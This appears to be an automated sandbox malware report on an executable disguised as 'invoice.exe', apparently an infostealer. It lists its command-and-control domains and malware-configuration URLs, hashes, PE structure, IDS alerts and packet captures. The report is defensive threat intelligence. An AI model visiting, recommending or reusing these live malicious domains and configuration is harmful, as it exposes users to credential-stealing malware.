https://ferroyxo.run/quiwdz | 100% | Avira URL Cloud | malware
https://ferroyxo.run/7 | 100% | Avira URL Cloud | malware
https://ferroyxo.run/quiwdzr2 | 100% | Avira URL Cloud | malware
ferroyxo.run/quiwdz | 100% | Avira URL Cloud | malware
https://ferroyxo.run/ | 100% | Avira URL Cloud | malware
https://ferroyxo.run/quiwdzb | 100% | Avira URL Cloud | malware
https://ferroyxo.run/quiwdz55 | 100% | Avira URL Cloud | malware

Contacted domains:

Name | IP | Active | Malicious | Antivirus Detection | Reputation
ferroyxo.run | 172.67.131.170 | true | true | | unknown
bg.microsoft.map.fastly.net | 199.232.210.172 | true | false | | high
pki-goog.l.google.com | 172.217.165.131 | true | false | | high
c.pki.goog | unknown | unknown | false | | high
URLs from the malware configuration:

Name | Malicious | Antivirus Detection | Reputation
weldorae.digital/geds | false | | high
oreheatq.live/gsopp | false | | high
steelixr.live/aguiz | false | | high
https://ferroyxo.run/quiwdz | false | Avira URL Cloud: malware | unknown
smeltingt.run/giiaus | false | | high
castmaxw.run/ganzde | false | | high
targett.top/dsANGt | false | | high
ferromny.digital/gwpd | false | | high
advennture.top/GKsiio | false | | high
ferroyxo.run/quiwdz | true | Avira URL Cloud: malware | unknown
URLs found in memory dumps:

Name | Source | Malicious | Antivirus Detection | Reputation
https://ferroyxo.run/quiwdzb | invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ferroyxo.run/ | invoice.exe, 00000000.00000003.979670115.0000000000838000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/ac/?q= | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ferroyxo.run/quiwdzr2 | invoice.exe, 00000000.00000003.972990055.0000000000838000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crl.rootca1.amazontrust.com/rootca1.crl0 | invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ac.ecosia.org?q= | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://ocsp.rootca1.amazontrust.com0: | invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br | invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ferroyxo.run/7 | invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmp; invoice.exe, 00000000.00000003.972990055.0000000000838000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://ferroyxo.run/7g | invoice.exe, 00000000.00000003.979948724.0000000000838000.00000004.00000020.00020000.00000000.sdmp; invoice.exe, 00000000.00000003.994824179.0000000000838000.00000004.00000020.00020000.00000000.sdmp; invoice.exe, 00000000.00000003.979670115.0000000000838000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
https://www.google.com/images/branding/product/ico/googleg_alldp.ico | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://www.ecosia.org/newtab/v20 | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ferroyxo.run/quiwdz55 | invoice.exe, 00000000.00000002.1003081386.0000000000838000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: malware | unknown
http://x1.c.lencr.org/0 | invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://x1.i.lencr.org/0 | invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://duckduckgo.com/chrome_newtabv20 | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://crt.rootca1.amazontrust.com/rootca1.cer0? | invoice.exe, 00000000.00000003.944026749.000000000328C000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://support.mozilla.org/products/firefoxgro.all | invoice.exe, 00000000.00000003.945225432.000000000336B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://gemini.google.com/app?q= | invoice.exe, 00000000.00000003.920567765.00000000032AA000.00000004.00000800.00020000.00000000.sdmp | false | | high
Contacted IPs:

IP | Domain | Country | ASN | ASN Name | Malicious
172.67.131.170 | ferroyxo.run | United States | 13335 | CLOUDFLARENETUS | true
                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1654483
                                                                        Start date and time:2025-04-02 11:41:46 +02:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 3m 17s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 134, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:2
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: invoice.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@1/0@2/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 3
Cookbook Comments:
• Found application associated with file extension: .exe
• Stop behavior analysis, all processes terminated
• Exclude process from analysis (whitelisted): SIHClient.exe
• Excluded IPs from analysis (whitelisted): 52.149.20.212, 52.165.164.15
• Excluded domains from analysis (whitelisted): fe3.delivery.mp.microsoft.com, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target invoice.exe, PID 6892 because there are no executed function
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
05:42:45 | API Interceptor | 7x Sleep call for process: invoice.exe modified
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pki-goog.l.google.com | random.exe | malicious | LummaC Stealer | 142.250.80.35
pki-goog.l.google.com | NVIDIA.exe | malicious | PureCrypter, AsyncRAT | 142.251.35.163
pki-goog.l.google.com | a.ps1 | malicious | PureCrypter, AsyncRAT | 142.250.81.227
pki-goog.l.google.com | PO-GST-20250401.vbs | malicious | Remcos | 142.251.32.99
pki-goog.l.google.com | REQUEST FOR PRICE QUOTATION FOR THE REVISED ITEMS.exe | malicious | Unknown | 142.250.65.227
pki-goog.l.google.com | cz4ZwB7N4G.exe | malicious | Unknown | 142.250.80.99
pki-goog.l.google.com | https://maltese.com.br/share-sensitive-files-securely/ | malicious | HTMLPhisher | 142.250.80.35
pki-goog.l.google.com | uninstall.exe | malicious | Unknown | 142.250.65.227
pki-goog.l.google.com | VUE-KMH-462E Missed Amex Entry-Mar-25 1.xlsm | malicious | Unknown | 142.250.65.163
pki-goog.l.google.com | cRDJEdXHDo.dll | malicious | Unknown | 142.251.40.131
bg.microsoft.map.fastly.net | random.exe | malicious | LummaC Stealer | 199.232.214.172
bg.microsoft.map.fastly.net | NVIDIA.exe | malicious | PureCrypter, AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | 3UQbvgGmir.exe | malicious | AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | qWR3lUj.exe | malicious | LummaC Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | index.exe | malicious | PureCrypter, AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | a.ps1 | malicious | PureCrypter, AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | NVIDIA.exe | malicious | PureCrypter, AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | a.ps1 | malicious | PureCrypter, AsyncRAT | 199.232.214.172
bg.microsoft.map.fastly.net | index.exe | malicious | PureCrypter, AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | PO-GST-20250401.vbs | malicious | Remcos | 199.232.210.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
CLOUDFLARENETUS | random.exe | malicious | LummaC Stealer | 172.67.197.67
CLOUDFLARENETUS | random.exe | malicious | LummaC Stealer | 104.21.16.1
CLOUDFLARENETUS | random.exe | malicious | LummaC Stealer | 104.21.80.1
CLOUDFLARENETUS | random.exe | malicious | LummaC Stealer | 172.67.197.67
CLOUDFLARENETUS | PQPYAYJJ.exe | malicious | Amadey | 172.67.184.191
CLOUDFLARENETUS | L6qFGFpZpp.exe | malicious | LummaC Stealer | 104.21.52.83
CLOUDFLARENETUS | qWR3lUj.exe | malicious | LummaC Stealer | 104.21.52.83
CLOUDFLARENETUS | zzX3PUhPOA.exe | malicious | LummaC Stealer | 104.21.52.83
CLOUDFLARENETUS | EdnFwO343A.exe | malicious | LummaC Stealer | 104.21.16.1
CLOUDFLARENETUS | https://maxenerwellness.com/ | malicious | Unknown | 104.17.24.14
Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | random.exe | malicious | LummaC Stealer | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | random.exe | malicious | LummaC Stealer | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | random.exe | malicious | LummaC Stealer | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | random.exe | malicious | LummaC Stealer | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | L6qFGFpZpp.exe | malicious | LummaC Stealer | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | qWR3lUj.exe | malicious | LummaC Stealer | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | zzX3PUhPOA.exe | malicious | LummaC Stealer | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | EdnFwO343A.exe | malicious | LummaC Stealer | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | yuioiuy.txt.ps1 | malicious | Unknown | 172.67.131.170
a0e9f5d64349fb13191bc781f81f42e1 | cfr4.txt.ps1 | malicious | Unknown | 172.67.131.170
No context
No created / dropped files found
File type: PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit): 7.338436894896284
TrID:
• Win32 Executable (generic) a (10002005/4) 99.96%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: invoice.exe
File size: 845'824 bytes
MD5: 57bcb61167abd03d9d98705ab39e79ab
SHA1: 487af25088915c0506635a7bd44cd65177f91689
SHA256: 7c321f8a0d6c357d3406afb96408968d107c81f8282e2353ea4cebed67432f88
SHA512: 45779c2b678df42f9f3e36501e95a17c32c5a0a694c03b5caaf2014d07aba79b569271a6bf83a0e87836c3f78f140ab3b50bb2d7eb21de44d01bf547b249837f
SSDEEP: 24576:BAzEBC+2X2jofsfO1AVPul+3Dhs2ccmsh:BAz+J2mMfd1LDlRsh
TLSH: 2B055A816AD703E5EA0DEC35441173BE468BADDDD9E1CA1ECCC60ECA6E86BD6101335E
File Content Preview: MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L...;..g.................z...j......P.............@..........................0............@.....................................<..
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x468550
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x67E8013B [Sat Mar 29 14:18:35 2025 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 71f2fc6f961ae32c66027ae469c38c53
Instruction
call 00007FA0B0AABB00h
call 00007FA0B0AAF72Bh
call 00007FA0B0AB2F96h
call 00007FA0B0AB66C1h
call 00007FA0B0AB96BCh
call 00007FA0B0ABC357h
call 00007FA0B0AC1F72h
call 00007FA0B0AC4D3Dh
call 00007FA0B0AC8918h
call 00007FA0B0ACD973h
call 00007FA0B0AD166Eh
call 00007FA0B0AD5369h
call 00007FA0B0ADA274h
call 00007FA0B0ADDB4Fh
call 00007FA0B0AE23AAh
call 00007FA0B0AE5F15h
call 00007FA0B0AEA4A0h
call 00007FA0B0AECA7Bh
call 00007FA0B0AF0AB6h
call 00007FA0B0AF5711h
call 00007FA0B0AFA69Ch
call 00007FA0B0AFD4A7h
call 00007FA0B0B01502h
call 00007FA0B0B04FCDh
call 00007FA0B0B07C78h
call 00007FA0B0B0A823h
call 00007FA0B0B0F95Eh
call 00007FA0B0B12AA9h
test eax, eax
jne 00007FA0B0B12A92h
call 00007FA0B0AAB980h
push 000000FFh
call dword ptr [004698BCh]
push 00000000h
call dword ptr [004698BCh]
int3
int3
int3
int3
int3
int3
int3
int3
push ebp
mov ebp, esp
push ebx
push edi
push esi
and esp, FFFFFFF8h
sub esp, 000002A8h
lea eax, dword ptr [esp+54h]
push eax
call dword ptr [000098CCh]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x697f4 | 0x3c | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc7000 | 0x2e69 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0x831c | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x698b4 | 0x84 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x67933 | 0x67a00 | e799d022f8043e1027820d7029de2b24 | False | 0.5544212718636912 | data | 6.099887056721714 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x69000 | 0xb36 | 0xc00 | f508e94a0d8ca49d8c474207e03c7890 | False | 0.5257161458333334 | Matlab v4 mat-file (little endian) \3551\206\230\373\264\310:\317O\274Xses?\276H\315\274\336\236&/\014\0107\2359\201)\272\022\376\257\227\362\354D\220\024\253\371\343\020\035\343\356Cn\340\020\264\021\343\210\312\327f\351, numeric, rows 3296, columns 4096, imaginary | 4.801213516305022 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x6a000 | 0x5ae00 | 0x5a600 | 9fd8572f91bd71e73607ab4ae7d92638 | False | 1.0000459241009683 | data | 7.999214056877976 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT | 0xc5000 | 0x4 | 0x200 | fa59424a48b8f68036a05001c1f92210 | False | 0.03125 | data | 0.06116285224115448 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.Dota | 0xc6000 | 0x60 | 0x200 | bf619eac0cdf3f68d496ea9344137e8b | False | 0.02734375 | data | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xc7000 | 0x2e69 | 0x3000 | 3a75e6b37623d4e2a39a18e0d78ff559 | False | 0.23592122395833334 | data | 3.5378064234923166 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xca000 | 0x831c | 0x8400 | d127f0dc7404dddbf97ddd292674ccbf | False | 0.7922585227272727 | data | 6.837145678856392 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_MENU | 0xc73a0 | 0x3a2 | data | | | 0.26129032258064516
RT_MENU | 0xc7744 | 0x744 | data | | | 0.20376344086021506
RT_MENU | 0xc7e88 | 0x1d8 | data | | | 0.336864406779661
RT_MENU | 0xc8060 | 0x756 | data | | | 0.19808306709265175
RT_MENU | 0xc87b8 | 0x634 | data | | | 0.21536523929471033
RT_DIALOG | 0xc8dec | 0x212 | data | | | 0.5037735849056604
RT_DIALOG | 0xc9000 | 0x184 | data | | | 0.5463917525773195
RT_DIALOG | 0xc9184 | 0x314 | data | | | 0.4213197969543147
RT_STRING | 0xc9498 | 0x23c | data | | | 0.3706293706293706
RT_STRING | 0xc96d4 | 0x1f4 | AmigaOS bitmap font "t", fc_YSize 28672, 21248 elements, 2nd "o", 3rd | | | 0.39
RT_ACCELERATOR | 0xc98c8 | 0x70 | data | | | 0.7946428571428571
RT_ACCELERATOR | 0xc9938 | 0x50 | data | | | 0.875
RT_ACCELERATOR | 0xc9988 | 0x50 | data | | | 0.8875
RT_ACCELERATOR | 0xc99d8 | 0x40 | data | | | 0.953125
RT_VERSION | 0xc9a18 | 0x244 | data | | | 0.5465517241379311
RT_MANIFEST | 0xc9c5c | 0x20d | XML 1.0 document, ASCII text | English | United States | 0.5352380952380953
DLL | Import
KERNEL32.dll | CloseHandle, CreateToolhelp32Snapshot, ExitProcess, GetCommandLineW, GetLastError, GetModuleHandleW, GetSystemInfo, GetTickCount, GlobalMemoryStatusEx, Process32FirstW, Process32NextW, Sleep, lstrcmpiW
USER32.dll | BeginPaint, DefWindowProcW, DestroyWindow, DispatchMessageW, DrawTextW, EndPaint, FillRect, GetDC, GetMessageW, LoadCursorW, PostQuitMessage, RegisterClassExW, ReleaseDC, SetCursor, SetFocus, ShowWindow, TranslateMessage, UpdateWindow
Description | Data
CompanyName | TechPro
FileDescription | Process network
FileVersion | 2.36.213.3383
ProductName | DataPro System
LegalCopyright | 2025 TechPro
InternalName | ProTech
Translation | 0x0409 0x04e4
Language of compilation system | Country where language is spoken
English | United States


Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-02T11:42:45.533112+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49681 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:46.849307+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49682 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:48.236401+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49683 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:49.246361+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49684 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:51.223014+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49685 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:52.409357+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49686 | 172.67.131.170 | 443 | TCP
2025-04-02T11:42:54.175757+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.7 | 49687 | 172.67.131.170 | 443 | TCP
• Total Packets: 99
• 443 (HTTPS)
• 53 (DNS)
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Apr 2, 2025 11:42:45.311676979 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:45.311729908 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:45.311795950 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:45.314977884 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:45.314996004 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:45.533039093 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:45.533112049 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:45.537491083 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:45.537504911 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:45.537789106 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:45.582853079 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:45.589519024 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:45.589519024 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:45.589770079 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.039433956 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.039557934 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.039614916 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:46.039644957 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.039717913 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.039768934 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:46.039777040 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.039895058 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.039947033 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:46.039954901 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.040081024 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.040124893 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:46.040132046 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.040725946 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.040774107 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:46.040781975 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.040875912 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.040921926 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:46.040929079 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.082885027 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
Apr 2, 2025 11:42:46.141397953 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.141609907 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.141704082 CEST | 443 | 49681 | 172.67.131.170 | 192.168.2.7
Apr 2, 2025 11:42:46.141729116 CEST | 49681 | 443 | 192.168.2.7 | 172.67.131.170
                                                                        Apr 2, 2025 11:42:46.141748905 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.141807079 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.141813993 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.141972065 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142024040 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142034054 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142216921 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142263889 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142271042 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142385960 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142441988 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142450094 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142551899 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142640114 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142647982 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142748117 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142797947 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.142803907 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.142990112 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.143049002 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.145817041 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.145838022 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.145848036 CEST49681443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.145853043 CEST44349681172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.636013031 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.636049986 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.636142015 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.636420965 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.636435986 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.849170923 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.849307060 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.850704908 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.850719929 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.851072073 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:46.852328062 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.852464914 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:46.852488995 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:47.378072977 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:47.378209114 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:47.378258944 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:47.378355980 CEST49682443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:47.378375053 CEST44349682172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.033591032 CEST49683443192.168.2.7172.67.131.170
                                                                        Apr 2, 2025 11:42:48.033664942 CEST44349683172.67.131.170192.168.2.7
                                                                        Apr 2, 2025 11:42:48.033751011 CEST49683443192.168.2.7172.67.131.170
